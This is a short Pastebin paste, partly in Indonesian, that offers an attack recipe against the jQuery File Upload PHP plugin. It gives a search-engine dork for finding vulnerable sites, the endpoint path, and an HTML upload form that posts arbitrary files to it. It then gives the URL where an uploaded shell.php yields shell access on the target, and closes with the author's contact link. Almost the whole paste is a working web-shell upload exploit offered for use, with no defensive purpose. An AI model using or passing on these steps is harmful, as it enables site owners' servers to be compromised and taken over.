Advertisement
xcyber-evil

[HTML] Jquery File Upload

Mar 28th, 2015
699
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.56 KB | None | 0 0
  1. dork : inurl:/global/plugins/jquery-file-upload/server/php/ *extand the dork
  2.  
  3. exploit : target.com/patch/assets/global/plugins/jquery-file-upload/server/php/
  4.  
  5. kalau vuln biasanya sama dengan formcraft
  6.  
  7. code html:
  8.  
  9. <form method="POST" action="target.com/assets/global/plugins/jquery-file-upload/server/php/"
  10. enctype="multipart/form-data">
  11. <input type="file" name="files[]" /><button>Upload</button>
  12. </form>
  13.  
  14. shell acces : target.com/patch/assets/global/plugins/jquery-file-upload/server/php/files/shell.php
  15.  
  16.  
  17.  
  18. contact : https://www.facebook.com/cyb3r.worm7
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement